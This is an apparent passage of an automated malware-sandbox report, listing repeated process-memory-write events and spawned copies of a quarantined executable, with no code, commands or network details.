PID 1848 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1292 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
PID 1848 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

